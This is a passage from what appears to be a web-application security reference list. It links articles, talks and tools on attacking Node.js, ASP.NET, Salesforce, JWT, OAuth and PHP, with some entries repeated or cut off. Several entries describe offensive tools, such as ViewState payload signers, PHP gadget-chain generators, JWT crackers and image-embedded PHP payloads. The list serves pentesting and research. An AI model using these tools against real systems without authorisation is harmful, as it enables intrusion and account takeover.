- The Fall Of Mighty Django, Exploiting Unicode Case Transformations - oxsha(2020)
- Ember.js
- Groovy
- H2
- GWT
- GWTMap - Reverse Engineering Google Web Toolkit Applications - Oliver Simmonnet(2020)
- GWTMap
- GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications. The purpose of this tool is to facilitate the extraction of any service method endpoints buried within a modern GWT application's obfuscated client-side code, and attempt to generate example GWT-RPC requests payloads to interact with them.
- MeteorJS
- mustache.js
- mustache-security(2013)
- This place will host a collection of security tips and tricks for JavaScript MVC frameworks and templating libraries.
- Wikis
- mustache-security(2013)
- NodeJS
- 101
- Educational
- A Roadmap for Node.js Security
- NodeGoat
- Being lightweight, fast, and scalable, Node.js is becoming a widely adopted platform for developing web applications. This project provides an environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them.
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- NodeJS: Remote Code Execution as a Service - Peabnuts123 – Kiwicon 2016
- It's Coming From Inside the House: An Inside-Out Approach to NodeJS Application Security - Yolonda Smith(CircleCityCon2019)
- Getting application security right often requires that developers have a deeper than average understanding of the security domain. In what other industry is this the case? We don't have to be M.D.s to get a medical diagnosis; we don't have to be auto mechanics to get our cars fixed, yet we in security wag our fingers at "iD10t errors" and build grand mousetraps to catch "so obvious" developer missteps, when they may not know what they need to add, change or remove from their applications to make it "secure" in the first place. Furthermore, patterns to address these issues don't always fit the requirements of the application short or long term, resulting in solutions that only address part of the problem, or worse, are omitted altogether because they are too cumbersome to implement. My answer to this is
_spartan
-a node application created for developers of node.js applications, not security people._spartan
allows developers to create security policies which address their node app's (whether it be Desktop, Web, Mobile, IoT or API) specific requirements; it installs & configures the modules to match the policy and; it generates the boilerplate code that developers can import directly into their applications.
- Getting application security right often requires that developers have a deeper than average understanding of the security domain. In what other industry is this the case? We don't have to be M.D.s to get a medical diagnosis; we don't have to be auto mechanics to get our cars fixed, yet we in security wag our fingers at "iD10t errors" and build grand mousetraps to catch "so obvious" developer missteps, when they may not know what they need to add, change or remove from their applications to make it "secure" in the first place. Furthermore, patterns to address these issues don't always fit the requirements of the application short or long term, resulting in solutions that only address part of the problem, or worse, are omitted altogether because they are too cumbersome to implement. My answer to this is
- Tools
- faker.js
- generate massive amounts of fake data in Node.js and the browser
- faker.js
- Hidden Property Abuse
- Discovering Hidden Properties to Attack Node js Ecosystem - Feng Xiao(DEFCON Safemode)
- BlackHat Slides
- Node.js is widely used for developing both server-side and desktop applications. It provides a cross-platform execution environment for JavaScript programs. Due to the increasing popularity, the security of Node.js is critical to web servers and desktop clients. We present a novel attack method against the Node.js platform, called hidden property abusing (HPA). The new attack leverages the widely-used data exchanging feature of JavaScript to tamper critical program states of Node.js programs, like server-side applications. HPA entitles remote attackers to launch serious attacks, such as stealing confidential data, bypassing security checks, and launching denial of service attacks. To help developers detect the HPA issues of their Node.js applications, we develop a tool, named LYNX, that utilizes hybrid program analysis to automatically reveal HPA vulnerabilities and even synthesize exploits. We apply LYNX on a set of widely-used Node.js programs and identify 13 previously unknown vulnerabilities. LYNX successfully generates 10 severe exploits. We have reported all of our findings to the Node.js community. At the time of paper writing, we have received the confirmation of 12 vulnerabilities and got 12 CVEs assigned. Moreover, we collaborated with an authoritative public vulnerability database to help them use a new vulnerability notion and description in related security issues. The talk consists of four parts. First, we will introduce recent offensive research on Node.js. Second, we will introduce HPA by demonstrating an exploit on a widely-used web framework. Third, we will explain how to leverage program analysis techniques to automatically detect and exploit HPA. In the end, we will have a comprehensive evaluation which discusses how we identified 13 HPA 0days with the help of our detection method.
- Discovering Hidden Properties to Attack Node js Ecosystem - Feng Xiao(DEFCON Safemode)
- phpMyAdmin
- React.JS
- Ruby-on-Rails * Ruby on Rails Penetration Testing - 3SLabs(2014) * Going AUTH the Rails on a Crazy Train - Tomek Rabczak Jeff Jarmoc(Derbycon2015) * Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it's up to the developers to keep themselves safe. In this talk, we take a look at patterns that we've seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails. * Vulnerabilities Within Ruby on Rails - Arvind Doraiswamy(2015) * Attacking Ruby on Rails Applications - joernchen(2016) * Zen Rails Security Checklist * This document provides a not necessarily comprehensive list of security measures to be implemented when developing a Ruby on Rails application. It is designed to serve as a quick reference and minimize vulnerabilities caused by developer forgetfulness. It does not replace developer training on secure coding principles and how they can be applied.
- Salesforce
- Articles
- SFDC Secure Development Cheat Sheet - Zach Julian(2019)
- Salesforce Lightning - Tinting the Windows - Aaron Costello(2020)
- Features of the Browser Fingerprint - Salesforce
- Salesforce Lightning - An in-depth look at exploitation vectors for the everyday community - Aaron Costello(2020)
- Lightning Components: A Treatise on Apex Security from an External Perspective - Aaron Costello(2021)
- in simple words: Pen-Testing Salesforce SAAS Application (Part 1 - The Essentials) - Praveen Kanniah(2021
- Are you oversharing (in Salesforce)? Our new tool could sniff it out! - Jerome Smith(2021)
- How Salesforce Helps Protect You From Session Hijacking Threats - Regunathan Radhakrishnan(2022)
- Hacking Salesforce-backed WebApps - hypn.za.net(2022)
- Understanding Salesforce Flows and Common Security Risks - Aaron Costello(2022)
- Tools
- Raccoon
- Salesforce object auditor
- Salesforce Recon and Exploitation Toolkit
- Salesforce Recon and Exploitation Toolkit
- Raccoon
- Articles
- Spring
- How Spring Web MVC Really Works - Stackify.com
- Spring View Manipulation Vulnerability - Michael Stepankin(2020)
- In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be.
- Springboot
- Articles/Blogposts
- Tools
- Symfony
- Vue.js
- Wordpress
- ASP.NET
- 101
- Articles/Blogposts/Writeups
- Getting Shell with XAMLX Files - Soroush Dalili
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili(2018)
- Uploading web.config for Fun and Profit 2 - Soroush Dalili(2019)
- Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data - Soroush Dalili
- XAML overview in WPF - docs.ms
- Rare ASP.NET request validation bypass using request encoding - nccgroup(2017)
- Covert Web Shells in .NET with Read-Only Web Paths - Soroush Dalili(2020)
- Presentations/Talks/Videos
- Tools
- viewstate
- A small Python 3.5+ library for decoding ASP.NET viewstate.
- viewgen
- viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- RCEvil.NET
- RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.
- viewstate
- General
- the_storm/ Unexpected Execution: Wild Ways Code Execution can Occur in Python - Graham Bleaney(PyConUS2021
- Code
- Every Python user knows that you can execute code using eval or exec, but what about yaml or str.format? This talk will take you on a walk through all the weird and wild ways that you can achieve code execution on a Python server (and trust me, I didn’t spoil the surprise by putting the weirdest ones in the description). The talk should be equal parts practical and entertaining as we work through both real examples of code execution vulnerabilities found in running code as well as absurd remote code execution exploits. The talk will end on a practical note by explaining how Facebook detects and prevents the exploit vectors we discussed, using an open source Python Static Analyzer called Pysa.
- the_storm/ Unexpected Execution: Wild Ways Code Execution can Occur in Python - Graham Bleaney(PyConUS2021
- Flask
- Articles/Blogposts/Writeups
- Injecting Flask - Ryan Reid
- In this adventure we will discuss some of the security features available and potential issues within the Flask micro-framework with respect to Server-Side Template Injection, Cross-Site Scripting, and HTML attribute injection attacks, a subset of XSS. If you’ve never had the pleasure of working with Flask, you’re in for a treat. Flask is a lightweight python framework that provides a simple yet powerful and extensible structure (it is Python after all).
- Injecting Flask - Ryan Reid
- Articles/Blogposts/Writeups
- 101
- json.org
- "JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language Standard ECMA-262 3rd Edition - December 1999. JSON is a text format that is completely language independent but uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python, and many others. These properties make JSON an ideal data-interchange language."
- JSON Schema
- JSON Schema is a declarative language that allows you to annotate and validate JSON documents.
- json.org
- Articles/Blogposts/Writeups
- Best Practices to Mitigate JSON Interoperability Vulnerabilities - Claudio Salazar(2021)
- An Exploration of JSON Interoperability Vulnerabilities - Jake Miller(2021)
- "TL;DR The same JSON document can be parsed with different values across microservices, leading to a variety of potential security risks."
- Tools
- JSON Interoperability Vulnerability Labs
- Companion labs to "An Exploration of JSON Interoperability Vulnerabilities"
- JSON Interoperability Vulnerability Labs
- 101
- JSON Web Token - Wikipedia
- RFC 7159: JSON Web Token (JWT)
- RFC 8725: JSON Web Token Best Current Practices\
- JSON Web Tokens, also known as JWTs, are URL-safe JSON-based security tokens that contain a set of claims that can be signed and/or encrypted. JWTs are being widely used and deployed as a simple security token format in numerous protocols and applications, both in the area of digital identity and in other application areas. This Best Current Practices document updates RFC 7519 to provide actionable guidance leading to secure implementation and deployment of JWTs.
- The Anatomy of a JSON Web Token
- Introduction to JSON Web Tokens
- JSON Web Token Flowchart
- JSON Web Token Security Cheat Sheet
- Learn JSON Web Token(JWT) in 10 Minutes - tutorialdocs.com
- Informational
- Articles/Blogposts/Writeups
- JWT Handbook - Auth0
- Reference Tokens and Introspection - leastprivilege.com(2015)
- Stop using JWT for sessions - joepie91(2016)
- Stop using JWT for sessions, part 2: Why your solution doesn't work - joepie91(2016)
- JSON Web Token Best Current Practices - draft-ietf-oauth-jwt-bcp-07
- JWTs: Which Signing Algorithm Should I Use? - Scott Brady(2020)
- The Hard Parts of JWT Security Nobody Talks About - Philippe De Ryck(2019)
- Building a Secure Signed JWT - Dan Noore(2020)
- Presentations/Talks/Videos
- Jwt==insecurity? - Ruxcon2018
- JSON Web Tokens Suck - Randall Degges (DevNet Create 2018)
- JSON Web Tokens (JWTs) are all the rage in the security world. They're becoming more and more ubiquitous in web authentication libraries, and are commonly used to store a user's identity information. In this talk, you'll learn why JWTs suck, and why you should never use them.
- Attacking and Securing JWT - @airman604(OWAPS Vancouver)
- JWTs in a Flash! - Evan Johnson(Defcon24)
- The new(ish) JOSE standard is growing rapidly in popularity. Many people are excited to adopt the new standard and use it to build interesting and new things with JWT! Let's get everyone up to speed on JWT's, talk about the do's and don't regarding JWTs, review some JWT uses, and use JWT's effectively.
- Are You Properly Using JWTs? - Dmitry Sotnikov(AppSec California2020)
- JSON Web tokens (JWTs) are used massively in API-based applications as access tokens or to transport information across services. Unfortunately, JWT are often mis-used and incorrectly handled. Massive data breaches have occurred in the last 18 months due to token leakage and lack of proper of validation. This session focuses on best practices and real world examples of JWT usage, where we cover: Typical scenarios where using JWT is a good idea; Typical scenarios where using JWT is a bad idea!; Principles of Zero trust architecture and why you should always validate; Best practices to thoroughly validate JWTs and potential vulnerabilities if you don’t.; Use cases when encryption may be required for JWT
- JWT Parkour - Louis Nyffenegger(AppSec California2020)
- Nowadays, JSON Web Tokens are everywhere. They are used as session tokens or just to pass data between applications or µservices. By design, JWT contains a high number of security and cryptography pitfalls. In this talk, we are going to learn how to exploit (with demos) some of those issues. After covering the basics (None and Algorithm confusion), we are going to move to kid injection, embedded JWK (CVE-2018-0114). Finally, we will look at jku and x5u attributes and how they can be abused by chaining vulnerabilities.
- JWT: jku x5u - Louis Nyffenegger(2020)
- Talk on JWT jku and x5u and how to attack them
- Articles/Blogposts/Writeups
- Attacking
- 101
- JWT Attack Playbook
- This wiki is a project to document the known attacks and potential security vulnerabilities and misconfigurations you may come across when testing JSON Web Tokens, and to provide a repeatable methodology for attacking them.
- JWT Hacking 101 - trustfoundry.net
- JWT Attack Playbook
- Articles/Blogposts/Writeups
- JWT Tool Attack Methods - ticarpi
- JWT Vulnerabilities (Json Web Tokens) - HackTricks
- JWT Attack Walk-Through - Jerome Smith(2019)
- Hacking JWT Tokens: The None Algorithm - Shivam Bathla
- How to Hack a Weak JWT Implementation with a Timing Attack - Tamas Polgar(2017)
- Practicing JWT Attacks Against Juice-Shop - scomurr(2020)
- Hardcoded secrets, unverified tokens, and other common JWT mistakes - Vasilii Ermilov(2020)
- Talks/Presentations
- Friday the 13th: JSON Attacks - Defcon25
- Critical vulnerabilities in JSON Web Token libraries - 2015
- Cracking JWT tokens: a tale of magic, Node.JS and parallel computing - Luciano Mammino(Codemotion Milan2017)
- Learn how you can use some JavaScript/Node.js black magic to crack JWT tokens and impersonate other users or escalate privileges. Just add a pinch of ZeroMQ, a dose of parallel computing, a 4 leaf clover, mix everything applying some brute force and you'll get a powerful JWT cracking potion!
- The Hacker's Guide to JWT Security by Patrycja Wegrzynowicz(2019)
- JSON Web Token (JWT) is an open standard for creating tokens that assert some number of claims like a logged in user and his/her roles. JWT is widely used in modern applications as a stateless authentication mechanism. Therefore, it is important to understand JWT security risks, especially when broken authentication is among the most prominent security vulnerabilities according to the OWASP Top 10 list. This talk guides you through various security risks of JWT, including confidentiality problems, vulnerabilities in algorithms and libraries, token cracking, token sidejacking, and more. In live demos, you’ll learn how to hijack a user account exploiting common security vulnerabilities on the client-side, on the server-side, and in transport. You’ll also find out about common mistakes and vulnerabilities along with the best practices related to the implementation of JWT authentication and the usage of available JWT libraries.
- "JWAT.... Attacking JSON Web Tokens" - Louis Nyffenegger(BSides Canberra 2019)
- Modern Webapp Pentesting: How to Attack a JWT - BB King(2020)
- In this Black Hills Information Security webcast - an excerpt from his upcoming 16-hour Modern Webapp Pentesting course - BB King will talk about what JSON Web Tokens are, why they're so controversial, and how to test for their major weaknesses. Then, using OWSAP's Juice Shop as a target, he'll show you a straightforward method for exploiting them that you can use on your own next webapp pentest
- 101
- Testing
- Tools
- json token decode
- JWT Inspector - FF plugin
- JWT Inspector is a browser extension that lets you decode and inspect JSON Web Tokens in requests, cookies, and local storage. Also debug any JWT directly from the console or in the built-in UI.
- c-jwt-cracker
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- jwt_tool
- a toolkit for validating, forging and cracking JWTs (JSON Web Tokens).
- Introducing JWT Tool - ticarpi
- jwt_secrets - BBhacKing
- A list of "secrets" from JWT sample code and readme files based on the list of projects at https://jwt.io/
- jwt-secrets - wallarm
- The goal for this project was to find as many public-available JWT secrets as possible to help developers and DevOpses identify it by traffic analysis at the Wallarm NGWAF level.
- Writeups
- How to configure Json.NET to create a vulnerable web API - alphabot
- 🔐 Learn how to use JSON Web Token (JWT) to secure your next Web App! (Tutorial/Example with Tests!!)
- Critical vulnerabilities in JSON Web Token libraries
- Brute Forcing HS256 is Possible: The Importance of Using Strong Keys in Signing JWTs
- Hacking JSON Web Token (JWT) - Hate_401
- JWT (JSON Web Token) (in)security - Michal Sadjak(2019)
- Practical Approaches for Testing and Breaking JWT Authentication - Mazin Ahmed
- JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight(2020))
- 101
- What is MIME Sniffing? - keycdn.com
- Content Sniffing - Wikipedia
- Content sniffing, also known as media type sniffing or MIME sniffing, is the practice of inspecting the content of a byte stream to attempt to deduce the file format of the data within it.
- MIME Sniffing - whatwg.org
- Media Type Sniffing | draft-ietf-websec-mime-sniff-03
- Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations
- Articles/Blogposts/Writeups
- Exploitation of
- Tools
- 101
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept19,2018
- This document describes best current security practices for OAuth 2.0.. It updates and extends the OAuth 2.0 Security Threat Model to incorporate practical experiences gathered since OAuth 2.0 was published and cover new threats relevant due to the broader application of OAuth 2.0.
- OAuth 2.0 Dynamic Client Registration Protocol - rfc7591
- This specification defines mechanisms for dynamically registering OAuth 2.0 clients with authorization servers. Registration requests send a set of desired client metadata values to the authorization server. The resulting registration responses return a client identifier to use at the authorization server and the client metadata values registered for the client. The client can then use this registration information to communicate with the authorization server using the OAuth 2.0 protocol. This specification also defines a set of common client metadata fields and values for clients to use during registration.
- The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request - ietf.org
- The authorization request in OAuth 2.0 described in RFC 6749 utilizes query parameter serialization, which means that Authorization Request parameters are encoded in the URI of the request and sent through user agents such as web browsers. While it is easy to implement, it means that (a) the communication through the user agents are not integrity protected and thus the parameters can be tainted, and (b) the source of the communication is not authenticated. Because of these weaknesses, several attacks to the protocol have now been put forward. This document introduces the ability to send request parameters in a JSON Web Token (JWT) instead, which allows the request to be signed with JSON Web Signature (JWS) and encrypted with JSON Web Encryption (JWE) so that the integrity, source authentication and confidentiality property of the Authorization Request is attained. The request can be sent by value or by reference.
- OAuth 2.0 Mutual TLS Client Authentication and Certificate Bound Access Tokens - ietf
- This document describes Transport Layer Security (TLS) mutual authentication using X.509 certificates as a mechanism for OAuth client authentication to the authorization sever as well as for certificate bound sender constrained access tokens as a method for a protected resource to ensure that an access token presented to it by a given client was issued to that client by the authorization server.
- RFC 6819: OAuth 2.0 Threat Model and Security Considerations
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-15
- The Modern Guide to OAuth - Brian Pontarelli, Dan Moore(2021)
- Signing in with Google - Okta
- Multi-Factor Authentication: 4 Challenges Faced by Developers - Micah Silverman(2018)
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept19,2018
- Articles/Blogposts/Writeups
- Dancing with OAuth: Understanding how Authorization Works - Ashish Mathur
- Shining a Light on OAuth Abuse with PwnAuth - Douglas Bienstock
- OAUTH – Everything you wanted to know but not really! - Elaheh Samani, Kevin Watkins
- An Illustrated Guide to OAuth and OpenID Connect - David Neal(2019)
- Analysis of Common Federated Identity Protocols: OpenID Connect vs OAuth 2.0 vs SAML 2.0 - hackedu.io
- RFC 8693 OAuth 2.0 Token Exchange
- Introduction to OAuth 2.0 and OpenID Connect - PragmaticWebSecurity
- Mastering OAuth 2.0 and OpenID Connect - PragmaticWebSecurity
- OAuth 2.0 : Explained - Milind Daftari(2019)
- What's new in OAuth 2.1? - Dan Moore(2020)
- Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2 - hackedu(2020)
- Google Oauth2 API Explained - Pumudu Ruhunage(2020)
- Hidden OAuth attack vectors - Michael Stepankin(2021)
- OAuth 2.0 authentication vulnerabilities - Portswigger
- Security Analysis in an OpenID Connect Lab Environment - Christian Fries(2021)
- OAuth by Sakurity
- Approaches for authenticating external applications in a machine-to-machine scenario - Patrick Sard and Jeremy Ware(2022)
- Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks - David Krispin, Nir Swartz(2021)
- OAuth 2.0 Hacking for Beginners with Farah Hawa - Farah Hawa
- An introduction to some authentication flows in OAuth 2.0 followed by a demo of some common bug types that can be found in them.
- alert(‘OAuth 2.0’); // The impact of XSS on OAuth 2.0 in SPAs - Philippe De Ryck
- OAuth Abuse: Think Solarwinds/Solorigate Campaign with Focus on Cloud Applications - Itir Clarke, Assaf Friedman(2021)
- 2FA Bypass via Google Identity & OAuth Login - Sharat Kaikolamthuruthil(2022)
- Account hijacking using "dirty dancing" in sign-in OAuth-flows - Frans Rosen(2022)
- How can Hackers Analyze the Attacks on OAuth 2.0? - anubhav.singh(2022)
- Presentations/Talks/Videos
- OAuth2: Beyond The Specs - Daniele Timo Second - BSides Lisbon2018
- What if you roll out OAuth, and realize there are a bunch of small things you didn’t consider? It’s what happened to us at Pipedrive, and although it’s likely not over just yet, we’re running smoothly. It’s a good time to share what we’ve learned and save others some time. While building Pipedrive’s marketplace for third-party apps, we transitioned from API token authentication to OAuth, and it’s been an interesting learning experience. In this talk, I will explain how the protocol works, discuss differences in how OAuth is implemented on different platforms, and explain how we managed the transition from API token to OAuth. I will explain how CSRF attacks work in OAuth, how the state parameter can prevent them, how to manage synchronization between server and clients, and what you can run into when you roll out OAuth for dozens of apps.
- OAuth 2.0 and OpenID Connect (in plain English) - Nate Barbettini(OktaDev)
- Discord Hangout: Practical OAuth Attacks - Scot Berner
- During this Discord Hangout, Scot Berner (@slobtresix0) provides some background on OAuth and how attackers can use it to gain access to an organization. Scot shows how Microsoft uses OAuth with Microsoft 365 along with how it can be used for social engineering and external attacks.
- OAuth: When Things Go Wrong - Aaron Parecki(2019)
- Slides
- Aaron Parecki discusses common security threats when building microservices using OAuth and how to protect yourself. You'll learn about high-profile API security breaches related to OAuth; common implementation patterns for mobile apps, browser-based apps, and web server apps; and the latest best practices around OAuth security being developed by the IETF OAuth working group.
- How To Hack OAuth|Øredev 2019 - Aaron Parecki(2019)
- OAuth is the foundation of most of modern online security, used everywhere from signing in to mobile apps, to protecting your bank accounts. Despite its ubiquity, it is still often difficult to implement safely and securely, especially in today's landscape, which is dramatically different from the world of online security as it existed when OAuth was initially created. This talk will explore several real-world OAuth hacks that affected major providers like Twitter, Facebook and Google. I'll share the details of how each specific attack happened, as well as what they could have done to prevent it. Some of these attacks exploited technical flaws in the system, and some exploited the easier to hack, squishier component in the middle: people.
- Implementation Pitfalls Of OAuth 2.0 - Samit Anwer(GreHack2019)
- "Since the beginning of distributed personal computer networks, one of the toughest problem has been to provide a secure SSO and authorization experience between unrelated servers/services. The OAuth 2.0 authorization framework enables 3rd party apps to obtain discretionary access to a web service. Built on top of OAuth, OpenID Connect is a helpful “identity layer” that provides developers with a framework to build an authentication system. In this race of providing OAuth/Open ID Connect based access to assets, authorization service providers have been forced to release half-baked solutions in the wild because of which relying parties and users face myriad of issues ranging from authorization code compromise (unauthorized resource access) to account takeovers. In this talk we will discuss common malpractices that "relying party" and "authorization service provider" developers perform when implementing OAuth/OpenID based solutions. We will learn the attacks that can happen thereof and mitigation."
- Introduction to OAuth 2.0 and OpenID Connect - Philippe De Ryck
- OAuth Bypass Technique - Sheikh Rizan(BSides Singapore2021)
- OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites but without giving them the passwords. We often see websites with “Sign in with Facebook” option. This facility provides convenience to the users that do not wish to sign up using the traditional username and password option. However, there exist a small number of websites that have poorly implemented OAuth allowing an attacker to bypass the authentication and impersonate another user to gain access to websites’ protected resources. This technique is known in the Bug Bounty community and is regarded as an authentication bypass or an account take-over. While there are various write-ups with regards to OAuth authentication bypass, this technique is not widely covered. We would like to present the technical details of the vulnerability we had found.
- Hacking Oauth Applications - Pt. 1 - HackingSimplified(2021)
- In this part we discuss about Oauth - What, Why & How and then look at some of the flows like authorization code grant and implicit grant. We close today's session by doing a hands-on with Portswigger lab on Implicit grant flow.
- OAuth2: Beyond The Specs - Daniele Timo Second - BSides Lisbon2018
- Attacking
- The most common OAuth 2.0 Hacks - Okhomiak
- Bypassing GitHub's OAuth flow - Teddy Katz
- Practical OAuth Abuse for Offensive Operations – Part 1 - Scot Berner(2020)
- An offensive guide to the Authorization Code grant - Rami McCarthy
- Bypassing GitHub's OAuth flow - Teddy Katz
- Penetration Tester's Guide to Evaluating OAuth 2.0 — Authorization Code Grants -
- OAuth 2.0 Implementation and Security - Haboob
- The Wondeful World of OAuth: Bug Bounty Edition - A Bug’z Life(2020)
- Account hijacking using "dirty dancing" in sign-in OAuth-flows - Frans Rosen(2022)
- Tools
- OAuth 2.0 Playground - Okta
- oauth2-proxy/oauth2-proxy
- A reverse proxy that provides authentication with Google, Azure, OpenID Connect and many more identity providers.
- Articles/Blogposts/Writeups
- Path Building vs Path Verifying: The Chain of Pain - Ryan Sleevi(2020)
- How to exploit parser differentials - Joern Schneeweisz(2020)
- Breaking Parser Logic: Gain Access To NGINX Plus API — Read/Write Upstreams. - zoid(2022)
- Pwning a Server using Markdown: Escalating a bug in a vulnerable markdown parser to exploit LFI and get RCE - Aditya Dixit
- Talks/Presentations/Videos
- Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! - Orange Tsai(2020)
- Slides
- "We propose a new exploit technique that brings a whole-new attack surface to defeat path normalization, which is complicated in implementation due to many implicit properties and edge cases. This complication, being under-estimated or ignored by developers for a long time, has made our proposed attack vector possible, lethal, and general. "
- Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! - Orange Tsai(2020)
- Tools
- Bypass-Url-Parser
- Tool that tests MANY url bypasses to reach a 40X protected page.
- Bypass-Url-Parser
- 101
- Articles/Blogposts/Writeups
101
- Articles/Blogposts/Writeups
- Pwning PHP mail() function For Fun And RCE | New Exploitation Techniques And Vectors
- The unexpected dangers of preg_replace
- Imagecreatefromgif-Bypass
- A simple helper script to find byte sequences present in both of 2 given files. The main purpose of this is to find bytes that remain untouched after being processed with imagecreatefromgif() PHP function from GD-LIB. That is the place where a malicious PHP script can be inserted to achieve some nasty RCE.
- Is PHP vulnerable and under what conditions?
- PHP7 Internals - Become a Wizard
- Welcome to the PHP Internals Hub - If you ever wondered about how PHP works internally and how you can exploit it: this is where you should start. In this repo, I show basic and advanced exploitation in PHP (some of the bugs reported by me). In every "chapter", you'll learn a little bit more about PHP Internals from an infosec perspective.
- Modern PHP Security Part 1: bug classes - Thomas Chauchefoin, Lena David(2020)
- Modern PHP Security Part 2: Breaching and hardening the PHP engine - Thomas Chauchefoin, Lena David(2020)
- Code Reuse
- 101
- Articles/Blogposts/Writeups
- Crypto
- 101
- Articles/Blogposts/Writeups
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayia
- We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications.We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators. While our techniques are designed for the PHP language, the principles behind our techniques and our algorithms are independent of PHP and can readily apply to any system that utilizes weak randomness generators or low entropy sources. Our results include: algorithms that reduce the entropy of time variables, identifying and exploiting vulnera- bilities of the PHP system that enable the recovery or reconstruction of PRNG seeds, an experimental analysis of the Hastad-Shamir framework for breaking truncated linear variables, an optimized online Gaussian solver for large sparse linear systems, and an algorithm for recovering the state of the Mersenne twister generator from any level of truncation. We demonstrate the gravity of our attacks via a number of case studies. Specifically, we show that a number of current widely used web applications can be broken using our tech- niques including Mediawiki, Joomla, Gallery, osCommerce and others.
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayia
- De/Serialization
- 101
- Articles/Blogposts/Writeups
- Demystifying Insecure Deserialization in PHP - Sourov Gosh(2020)
- Writing Exploits For Exotic Bug Classes: unserialize()
- Remote code execution via PHP [Unserialize] - notsosecure
- PHP Generic Gadget Chains: Exploiting unserialize in unknown environments
- PHPGGC: PHP Generic Gadget Chains
- PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. Currently, the tool supports: Doctrine, Guzzle, Laravel, Monolog, Slim, SwiftMailer.
- File Operation Induced Unserialization via the "phar://" Stream Wrapper - secarma labs
- PHP Object Injection Cheat Sheet - Lucian Nitescu(2018)
- Testing Methodology for Insecure Deserialization Vulnerability - SecureLayer7(2021)
- Insecure Deserialization - How to Trace Down a Gadget Chain - redteampentesting(2021)
- Remote code execution through unsafe unserialize in PHP - Sjoerd Langkemper(2021)
- Unserializable, but unreachable: Remote code execution on vBulletin - Charles Fol(2023)
- Talks/Presentations/Videos
- Intro to PHP Deserialization / Object Injection - Ippsec(2019)
- Advanced PHP Deserialization - Phar Files - Ippsec(2019)
- Exploiting PHP7 unserialize - Yannay Livneh (33c3)
- PHP-7 is a new version of the most prevalent server-side language in use today. Like previous version, this version is also vulnerable to memory corruptions. However, the language has gone through extensive changes and none of previous exploitation techniques are relevant. In this talk, we explore the new memory internals of the language from exploiters and vulnerability researchers point of view. We will explain newly found vulnerabilities in the 'unserialize' mechanism of the language and present re-usable primitives for remote exploitation of these vulnerabilities.
- Pictures
- Hacking with Pictures - Syscan2015
- Exploiting PHP-GD imagecreatefromjpeg() function - fakhrizulkifli
- Proof-of-concept to exploit the flaw in the PHP-GD built-in function, imagecreatefromjpeg(). Inspired by one of Reddit's comment on my previous thread regarding exploiting the imagecreatefromgif() PHP-GD function.
- Property-Oriented Programming(POP)
- Code Reuse Attacks in PHP: Automated POP Chain Generation
- In this paper, we study code reuse attacks in the context of PHP-based web applications. We analyze how PHP object injection (POI) vulnerabilities can be exploited via property-oriented programming (POP) and perform a systematic analysis of available gadgets in common PHP applications. Furthermore, we introduce an automated approach to statically detect POI vulnerabilities in object-oriented PHP code. Our approach is also capable of generating POP chains in an automated way. We implemented a prototype of the proposed approach and evaluated it with 10 well-known applications. Overall, we detected 30 new POI vulnerabilities and 28 new gadget chains
- Utilizing Code Reuse/ROP in PHP Application Exploits - BH 2010
- POP-Exploit
- Research into Property Oriented Programming about php applications.
- Code Reuse Attacks in PHP: Automated POP Chain Generation
- Filters
- PHP filter_var shenanigans - Jordy Zomer(2021
- "It is likely that we have all seen PHP filters that prevent us from encountering vulnerabilities. Here in this blog post, I’ll walk you through my thought process for bypassing a filter by looking for a bug in the filter itself in order to reach a bug!"
- PHP filters chain: What is it and how to use it - Rémi Matasse(2022)
- "In this article we will explain how to combine a recently discovered technique called PHP filters [LOKNOP-GIST], to transform file inclusion primitives in PHP applications to remote code execution."
- PHP filter_var shenanigans - Jordy Zomer(2021
- Function Injection
- Bypassing Disabled Functions
- Polyglots
- String Parsing
